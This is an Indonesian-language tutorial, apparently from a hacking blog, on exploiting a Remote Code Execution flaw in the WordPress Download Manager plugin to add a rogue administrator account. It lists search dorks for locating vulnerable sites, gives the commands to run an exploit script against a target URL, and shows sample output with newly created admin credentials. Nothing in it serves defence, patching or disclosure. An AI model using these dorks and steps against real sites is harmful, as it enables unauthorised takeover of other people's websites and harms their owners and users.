Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,
Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. ( Sumber : FACEBOOK )
Bahan :
- Python ( Untuk Pengguna Windows yang belum terinstall python di cmd silahkan download dan install dulu )
- Script Exploiter ( Ekstensi : Python )
Dork :
- index of "download-manager"
- index of "download-manager" inurl:/wp
- index of "download-manager" inurl:/wordpress/
Step :
- Buka Terminal anda
- Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
- Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
- Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com
SEKEDAR GAMBARAN JIKA BERHASIL
[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F
Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)